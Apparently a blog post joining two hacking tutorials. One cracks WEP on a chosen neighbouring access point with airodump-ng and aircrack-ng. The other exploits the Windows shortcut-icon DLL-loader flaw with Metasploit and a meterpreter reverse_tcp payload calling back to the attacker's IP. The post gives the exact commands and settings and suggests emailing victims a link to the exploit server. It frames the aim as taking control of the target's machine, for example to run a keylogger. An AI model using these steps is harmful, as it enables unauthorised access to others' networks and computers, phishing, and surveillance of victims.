Cracking WEP Encryption With Kali Linux

In this tutorial we will see how easy it is to crack WEP encryption on a wireless access point. WEP is now very outdated, after it’s easy vulnerability was exposed. However you will still find some access points using WEP, and for educational purposes I wish to demonstrate how easy it is to break, which should encourage you to switch to WPA if you haven’t done so already.

It is also a good starting point for you to learn the basics of how to use airodump-ng and aircrack-ng tools within the terminal window.

I’m using the Kali Linux distribution that comes with these tools already installed. If you haven’t done so already I advise you download and setup a USB live drive running Kali Linux. If you’re a mac user you will find this tutorial useful as I also address the wireless driver issues that frequently plague Mac users trying to run aircrack.

STEP 1
First we will run airodump-ng to scan for available wireless networks and identify one running WEP that we wish to connect to.01_airodump

As you can see there’s several networks with WEP available, we will target the last in the list. press control c to stop airodump and run the following command
airodump-ng -w <directory to write the file to> -c <channel number> –bssid <MAC of target access point> <wireless interface>
02_airodump

As you can see I am saving the captured packets to a local directory on my system, and I set the channel and BSSID to the channel and bossed indicated in our initial scan. Finally as I am using a mac I have got the prism0 wireless interface which is being used for wireless monitoring. If you’re on another machine I assume you have already enabled monitor mode with the airmon-ng command.

When you hit enter airodump will then begin gathering packets and writing them tot he capture file. You will need to capture around 10,000 IV’s before it will be possible to start cracking the WEP encryption, typically I have found I need around 2,000 IV’s to be successful.

STEP 2
Leave the terminal window open with airodump capturing packets, and start a new terminal window. Here will run aircrack-ng with the following command
aircrack-ng <directory to the capture file>
03_aircrack

When you hit enter aircrack-ng will open the capture file and begin to try to crack the WEP encryption. If successful it will display the result in Hexadecimal code. If it’s not successful it will indicate not enough IV’s have been captured. Simply leave the window open it will automatically retry when the next 5k IV’s have been captured.

04_aircrack

When you finally have captured enough IV’s it will display the successfully cracked password in Hexadecimal format. You can use an online converter tool to convert this to ASCII characters if you wish, or enter the HEX without the : separators.
06_cracked

Windows Attack With Metasploit Tutorial

In this tutorial we will be exploiting a vulnerability within windows related to the icon_dllloader. This will allow us to deliver the meterpreter payload which gives us access to the target machine and would allow for us to run a key logger service for example.

PREREQUISITS
In order to begin this tutorial you should already be familiar with the basics of the Metasploit framework. If you don’t already know how to start the database service and get the Metasploit console operational then I advise you to checkout my introduction to Metasploit tutorial here.

STEP 1
After you have started Metasploit with the msfconsole command we will load our intended module with the following command
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

01_use exploit

STEP 2
Once we have loaded the module, we will set the payload that we intend to deliver. We are going to use the meterpreter reverse_tcp payload. We will load this with the following command
set payload windows/meterpreter/reverse_tcp

02_set payloadSTEP 3
Now we will set the options for the parameters we need to define in order for our attack to function. We need to set the SRVHOST and the LHOST. For these we will set them to to the IP address of the machine we have running metasploit. In this example we are in the same LAN as the target machine so we will use our LAN IP address. If you were targeting a remote machine via the internet for example, then you would need to point this to the public WAN IP address of your router and have some forwarding setup to the metasploit machine. For ease of demonstration however we are attacking a machine in our own LAN, so we will use the local network IP address.
set SRVHOST 192.168.0.8
set LHOST 192.168.0.8

03_set options

Once we have set these you can use the show options command to display the settings to make sure everything is set correctly.

04_check options

STEP 4
Now everything is setup we are ready to Rock ‘n’ Roll and start our exploit. Use the command exploit to begin.

05_exploit

You can see that everything has now been setup, and the server has been started. This is running now as a background job, so simply leave the terminal window open and we wait.

Wait for what?? Well, you now need to get the target machine to run the vulnerability in their operating system to allow metasploit to make the connection. As you can see the terminal window has given us some hints. One easy way is to get the target machine to click on the given URL http://192.168.0.8:80/. You could send an e-mail containing a hyperlink in the hope that the receiver will click on this. Once they do, and assuming there’s no antivirus running on their machine, it will allow you to make a connection to meterpreter and gain access to take control of their machine.